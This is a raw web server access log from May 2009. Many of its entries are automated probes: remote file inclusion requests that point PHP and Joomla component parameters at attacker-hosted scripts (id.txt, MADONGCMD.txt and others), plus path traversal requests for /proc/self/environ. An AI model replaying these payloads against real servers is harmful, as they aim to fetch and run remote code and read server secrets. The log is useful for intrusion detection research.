217.18.76.16 - - [14/May/2009:00:31:09 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
207.182.137.218 - - [14/May/2009:00:32:44 -0500] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://208.98.22.241/id.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.820"
207.182.137.218 - - [14/May/2009:00:32:44 -0500] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://208.98.22.241/id.txt??? HTTP/1.1" 404 292 "-""libwww-perl/5.820"
66.249.67.180 - - [14/May/2009:00:33:48 -0500] "GET /logs/access_log.1169510400 HTTP/1.1" 200 18761 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
85.214.24.22 - - [14/May/2009:00:33:49 -0500] "GET /logs/mvcw.php?step=1&vwar_root=http://www.ambient-arts.co.uk/us/id.txt??? HTTP/1.1" 404 296 "-""libwww-perl/5.803"
85.214.24.22 - - [14/May/2009:00:33:49 -0500] "GET /logs/mvcw.php?step=1&vwar_root=http://www.ambient-arts.co.uk/us/id.txt??? HTTP/1.1" 404 296 "-""libwww-perl/5.803"
85.214.24.22 - - [14/May/2009:00:33:50 -0500] "GET /mvcw.php?step=1&vwar_root=http://www.ambient-arts.co.uk/us/id.txt??? HTTP/1.1" 404 291 "-""libwww-perl/5.803"
85.214.24.22 - - [14/May/2009:00:33:50 -0500] "GET /mvcw.php?step=1&vwar_root=http://www.ambient-arts.co.uk/us/id.txt??? HTTP/1.1" 404 291 "-""libwww-perl/5.803"
87.106.135.14 - - [14/May/2009:00:33:59 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
87.106.135.14 - - [14/May/2009:00:33:59 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
87.106.135.14 - - [14/May/2009:00:34:05 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
87.106.135.14 - - [14/May/2009:00:34:05 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
217.18.76.16 - - [14/May/2009:00:34:21 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
217.18.76.16 - - [14/May/2009:00:34:21 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
216.117.191.71 - - [14/May/2009:00:34:24 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.65"
216.117.191.71 - - [14/May/2009:00:34:24 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.65"
217.18.76.16 - - [14/May/2009:00:34:41 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
217.18.76.16 - - [14/May/2009:00:34:41 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
148.243.72.112 - - [14/May/2009:00:34:53 -0500] "GET //include/bbs.lib.inc.php?site_path=http://shakur.sanjosedelmar.com/fx29id.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
148.243.72.112 - - [14/May/2009:00:34:53 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://shakur.sanjosedelmar.com/fx29id.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
148.243.72.112 - - [14/May/2009:00:34:53 -0500] "GET /logs/access_log.1233705600//include/bbs.lib.inc.php?site_path=http://shakur.sanjosedelmar.com/fx29id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
148.243.72.112 - - [14/May/2009:00:34:53 -0500] "GET /logs/access_log.1238889600//include/bbs.lib.inc.php?site_path=http://shakur.sanjosedelmar.com/fx29id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
87.106.135.14 - - [14/May/2009:00:35:57 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
87.106.135.14 - - [14/May/2009:00:35:57 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
207.182.137.218 - - [14/May/2009:00:37:07 -0500] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://208.98.22.241/id.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.820"
207.182.137.218 - - [14/May/2009:00:37:07 -0500] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://208.98.22.241/id.txt??? HTTP/1.1" 404 292 "-""libwww-perl/5.820"
87.106.135.14 - - [14/May/2009:00:38:25 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
87.106.135.14 - - [14/May/2009:00:38:26 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
66.249.67.180 - - [14/May/2009:00:39:06 -0500] "GET /logs/access_log.1170288000 HTTP/1.1" 200 36968 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
65.55.208.134 - - [14/May/2009:00:39:40 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.134 - - [14/May/2009:00:39:40 -0500] "GET /logs/access_log.1229731200 HTTP/1.1" 200 97615 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
207.182.137.218 - - [14/May/2009:00:40:21 -0500] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
207.182.137.218 - - [14/May/2009:00:40:21 -0500] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
207.182.137.218 - - [14/May/2009:00:40:21 -0500] "GET /logs/access_log.1240531200/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
66.249.67.180 - - [14/May/2009:00:44:23 -0500] "GET /logs/access_log.1192147200 HTTP/1.1" 200 3261 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
91.202.4.158 - - [14/May/2009:00:45:23 -0500] "GET /logs//pollphp/textfile//admin/common.inc.php?base_path=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 327 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
91.202.4.158 - - [14/May/2009:00:45:23 -0500] "GET //pollphp/textfile//admin/common.inc.php?base_path=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 322 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
91.202.4.158 - - [14/May/2009:00:45:23 -0500] "GET /logs/errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 298 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
91.202.4.158 - - [14/May/2009:00:45:23 -0500] "GET /errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 293 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
91.202.4.158 - - [14/May/2009:00:45:24 -0500] "GET //pollphp/textfile//admin/common.inc.php?base_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 322 "-""XXXXXX"
91.202.4.158 - - [14/May/2009:00:45:24 -0500] "GET /logs//pollphp/textfile//admin/common.inc.php?base_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 327 "-""XXXXXX"
91.202.4.158 - - [14/May/2009:00:45:24 -0500] "GET /logs//pollphp/textfile//admin/common.inc.php?base_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 327 "-""XXXXXX"
91.202.4.158 - - [14/May/2009:00:45:24 -0500] "GET //pollphp/textfile//admin/common.inc.php?base_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""XXXXXX"
217.199.222.19 - - [14/May/2009:00:45:40 -0500] "GET /logs//parse/parser.php?WN_BASEDIR=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
217.199.222.19 - - [14/May/2009:00:45:40 -0500] "GET //parse/parser.php?WN_BASEDIR=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
217.199.222.19 - - [14/May/2009:00:45:40 -0500] "GET /logs/access_log.1239321600//parse/parser.php?WN_BASEDIR=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
217.199.222.19 - - [14/May/2009:00:45:41 -0500] "GET /logs/access_log.1237680000//parse/parser.php?WN_BASEDIR=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
195.5.168.93 - - [14/May/2009:00:46:00 -0500] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://sherif.do.am/id.txt??? HTTP/1.1" 404 315 "-""libwww-perl/5.825"
195.5.168.93 - - [14/May/2009:00:46:00 -0500] "GET /includes/ktedit/toolbar.php?dirDepth=http://sherif.do.am/id.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.825"
217.18.76.16 - - [14/May/2009:00:46:06 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
217.18.76.16 - - [14/May/2009:00:46:06 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
195.5.168.93 - - [14/May/2009:00:46:13 -0500] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?http://free-merchant-account.investstores.com/id.txt? HTTP/1.1" 404 353 "-""libwww-perl/5.825"
195.5.168.93 - - [14/May/2009:00:46:13 -0500] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?http://free-merchant-account.investstores.com/id.txt? HTTP/1.1" 404 348 "-""libwww-perl/5.825"
195.5.168.93 - - [14/May/2009:00:46:16 -0500] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?http://free-merchant-account.investstores.com/id.txt? HTTP/1.1" 404 353 "-""libwww-perl/5.825"
195.5.168.93 - - [14/May/2009:00:46:16 -0500] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?http://free-merchant-account.investstores.com/id.txt? HTTP/1.1" 404 348 "-""libwww-perl/5.825"
148.243.72.112 - - [14/May/2009:00:46:48 -0500] "GET /logs/access_log.1233705600//include/bbs.lib.inc.php?site_path=http://shakur.sanjosedelmar.com/fx29id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
148.243.72.112 - - [14/May/2009:00:46:48 -0500] "GET /logs/access_log.1238889600//include/bbs.lib.inc.php?site_path=http://shakur.sanjosedelmar.com/fx29id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
148.243.72.112 - - [14/May/2009:00:46:48 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://shakur.sanjosedelmar.com/fx29id.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
148.243.72.112 - - [14/May/2009:00:46:48 -0500] "GET //include/bbs.lib.inc.php?site_path=http://shakur.sanjosedelmar.com/fx29id.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
66.249.67.180 - - [14/May/2009:00:49:40 -0500] "GET /logs/access_log.1221955200 HTTP/1.1" 200 4093 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
124.0.54.98 - - [14/May/2009:00:49:53 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
124.0.54.98 - - [14/May/2009:00:49:53 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
124.0.54.98 - - [14/May/2009:00:49:53 -0500] "GET /logs/access_log.1239321600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
124.0.54.98 - - [14/May/2009:00:50:31 -0500] "GET /logs/access_log.1239926400///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
148.243.72.112 - - [14/May/2009:00:50:59 -0500] "GET /logs/access_log.1238198400//include/bbs.lib.inc.php?site_path=http://shakur.sanjosedelmar.com/fx29id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
213.186.113.5 - - [14/May/2009:00:51:16 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 355 "-""libwww-perl/5.79"
213.186.113.5 - - [14/May/2009:00:51:16 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 350 "-""libwww-perl/5.79"
213.186.113.5 - - [14/May/2009:00:51:17 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 355 "-""libwww-perl/5.79"
213.186.113.5 - - [14/May/2009:00:51:17 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 350 "-""libwww-perl/5.79"
87.106.135.14 - - [14/May/2009:00:51:42 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
87.106.135.14 - - [14/May/2009:00:51:42 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
217.18.76.16 - - [14/May/2009:00:53:10 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
217.18.76.16 - - [14/May/2009:00:53:10 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
69.90.72.88 - - [14/May/2009:00:54:16 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
69.90.72.88 - - [14/May/2009:00:54:16 -0500] "GET //skin/zero_vote/error.php?dir=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
66.249.67.180 - - [14/May/2009:00:54:57 -0500] "GET /logs/access_log.1146096000 HTTP/1.1" 200 4008 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
69.90.72.88 - - [14/May/2009:00:57:26 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
69.90.72.88 - - [14/May/2009:00:57:28 -0500] "GET //skin/zero_vote/error.php?dir=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
66.249.67.180 - - [14/May/2009:01:00:14 -0500] "GET /logs/access_log.1109462400 HTTP/1.1" 200 2123 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
65.55.106.123 - - [14/May/2009:01:01:30 -0500] "GET /logs/access_log.1220572800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.215 - - [14/May/2009:01:04:29 -0500] "GET /logs/access_log.1122768000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
66.249.67.180 - - [14/May/2009:01:05:31 -0500] "GET /logs/access_log.1153267200 HTTP/1.1" 200 705 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.67.180 - - [14/May/2009:01:10:48 -0500] "GET /logs/access_log.1151366400 HTTP/1.1" 200 1818 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
84.201.208.50 - - [14/May/2009:01:14:42 -0500] "GET /logs/access_log.1237161600//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
84.201.208.50 - - [14/May/2009:01:14:42 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
84.201.208.50 - - [14/May/2009:01:14:42 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
84.201.208.50 - - [14/May/2009:01:14:42 -0500] "GET /logs/access_log.1230768000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
122.116.178.20 - - [14/May/2009:01:15:20 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.ladyboss.com.ua/fx29id2.txt??? HTTP/1.1" 404 315 "-""Mozilla/5.0"
122.116.178.20 - - [14/May/2009:01:15:35 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.ladyboss.com.ua/fx29id2.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
122.116.178.20 - - [14/May/2009:01:15:35 -0500] "GET /logs/access_log.1237507200//faqsupport/samplefaqsupport.php?path[docroot]=http://www.ladyboss.com.ua/fx29id2.txt??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
122.116.178.20 - - [14/May/2009:01:15:36 -0500] "GET /logs/access_log.1238889600//faqsupport/samplefaqsupport.php?path[docroot]=http://www.ladyboss.com.ua/fx29id2.txt??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
66.249.67.180 - - [14/May/2009:01:16:05 -0500] "GET /logs/access_log.1204329600 HTTP/1.1" 200 1642 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
121.165.73.157 - - [14/May/2009:01:17:37 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.gdiscount.fr///modules/ab.txt?? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
121.165.73.157 - - [14/May/2009:01:17:38 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.gdiscount.fr///modules/ab.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
216.129.119.16 - - [14/May/2009:01:21:17 -0500] "GET /logs/access_log.1239840000 HTTP/1.0" 200 325022 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
66.249.67.180 - - [14/May/2009:01:21:28 -0500] "GET /logs/access_log.1187827200 HTTP/1.1" 200 337 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
213.186.113.5 - - [14/May/2009:01:22:22 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
213.186.113.5 - - [14/May/2009:01:22:23 -0500] "GET //Neos_Chronos/header.php?base_folder=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
122.153.212.195 - - [14/May/2009:01:23:27 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
122.153.212.195 - - [14/May/2009:01:23:32 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
122.153.212.195 - - [14/May/2009:01:23:36 -0500] "GET /logs/access_log.1240531200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
122.153.212.195 - - [14/May/2009:01:23:37 -0500] "GET /logs/access_log.1239408000///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
124.0.54.98 - - [14/May/2009:01:25:55 -0500] "GET /logs/access_log.1239408000///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
124.0.54.98 - - [14/May/2009:01:25:55 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
124.0.54.98 - - [14/May/2009:01:25:55 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
124.0.54.98 - - [14/May/2009:01:25:56 -0500] "GET /logs/access_log.1240531200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
66.249.67.180 - - [14/May/2009:01:26:41 -0500] "GET /logs/access_log.1181520000 HTTP/1.1" 200 592 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
65.55.106.124 - - [14/May/2009:01:27:59 -0500] "GET /_vti_cnf/?D=D HTTP/1.1" 200 676 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
62.103.26.184 - - [14/May/2009:01:30:49 -0500] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://shakur.sanjosedelmar.com/fx29id.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
62.103.26.184 - - [14/May/2009:01:30:54 -0500] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://shakur.sanjosedelmar.com/fx29id.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
62.103.26.184 - - [14/May/2009:01:30:54 -0500] "GET /logs/access_log.1239926400//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://shakur.sanjosedelmar.com/fx29id.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
62.128.135.52 - - [14/May/2009:01:31:28 -0500] "GET //roster/addons/guildbank/searcharrays.php?addonDir=http://www.gitchigaming.com/.inv?? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
62.128.135.52 - - [14/May/2009:01:31:28 -0500] "GET /logs//roster/addons/guildbank/searcharrays.php?addonDir=http://www.gitchigaming.com/.inv?? HTTP/1.1" 404 329 "-""libwww-perl/5.805"
213.186.113.5 - - [14/May/2009:01:31:34 -0500] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
213.186.113.5 - - [14/May/2009:01:31:35 -0500] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
66.249.67.180 - - [14/May/2009:01:31:57 -0500] "GET /logs/access_log.1180310400 HTTP/1.1" 200 941 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.120.237.150 - - [14/May/2009:01:32:19 -0500] "GET /logs//roster/addons/guildbank/searcharrays.php?addonDir=http://www.gitchigaming.com/.inv?? HTTP/1.1" 404 329 "-""libwww-perl/5.811"
